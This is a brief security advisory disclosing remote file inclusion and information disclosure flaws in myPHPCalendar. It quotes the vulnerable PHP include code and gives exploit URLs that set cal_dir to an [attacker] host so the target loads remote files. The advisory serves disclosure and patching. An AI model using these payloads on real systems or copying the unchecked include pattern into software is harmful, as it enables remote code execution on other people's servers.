myPHPCalendar version 10192000 Build 1 Beta has information disclosure and file inclusion vulnerabilities that lie in the admin.php, contacts.php, and convert-date.php files.
f56d14d24dbb672d0ed0dc9af5d9067138454aecf329388b20d3cfd8edb2dbec
Informations :
°°°°°°°°°°°°°
Language : PHP
Version : 10192000 Build 1 Beta
Website : https://myphpcalendar.sourceforge.net/
Problems :
- Informations Disclosure
- File Include
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
admin.php, contacts.php, convert-date.php :
------------------------
include ("globals.inc");
------------------------
globals.inc :
------------------------------
include($cal_dir."vars.inc");
include($cal_dir."prefs.inc");
------------------------------
index.php :
----------------------------------------
include ($cal_dir."globals.inc");
[...]
include($cal_dir."sql.inc");
----------------------------------------
setup.php :
----------------------------------------------------------------
$fp = fopen("setup.inc", "w+");
fputs($fp, "<?php\n");
fputs($fp, "\$url = \"".$URL."\";\n");
fputs($fp, "\$mainscript = \"".$MAINSCRIPT."\";\n");
fputs($fp, "\$mysql_server = \"".$MYSQL_SERVER."\";\n");
fputs($fp, "\$mysql_username = \"".$MYSQL_USERNAME."\";\n");
fputs($fp, "\$mysql_pass = \"".$MYSQL_PASS."\";\n");
fputs($fp, "\$database_name = \"".$DATABASE_NAME."\";\n");
fputs($fp, "\$db_type = \"".$DB_TYPE."\";\n");
fputs($fp, "\$user_text = \"".$USER_TEXT."\";\n");
fputs($fp, "\$crypt_type = \"".$CRYPT_TYPE."\";\n");
fputs($fp, "\$display_username = \"".$DISPLAY_USERNAME."\";\n");
fputs($fp, "\$maxdisplay = \"".$MAXDISPLAY."\";\n");
fputs($fp, "\$admin_email = \"".$ADMIN_EMAIL."\";\n");
----------------------------------------------------------------
Exploits :
°°°°°°°°
https://[target]/admin.php?cal_dir=https://[attacker]/
https://[target]/contacts.php?cal_dir=https://[attacker]/
https://[target]/convert-date.php?cal_dir=https://[attacker]/
will include the files :
https://[attacker]/vars.inc and/or https://[attacker]/prefs.inc
and https://[target]/index.php?cal_dir=https://[attacker]/ will include the
files :
https://[target]/globals.inc https://[target]/sql.inc
Patch :
°°°°°°°
A patch and more details can be found on https://www.phpsecure.info.
frog-m@n
_________________________________________________________________
Utilisez votre MSN Messenger via votre GSM !
https://www.fr.msn.be/gsm/servicesms/messengerparsms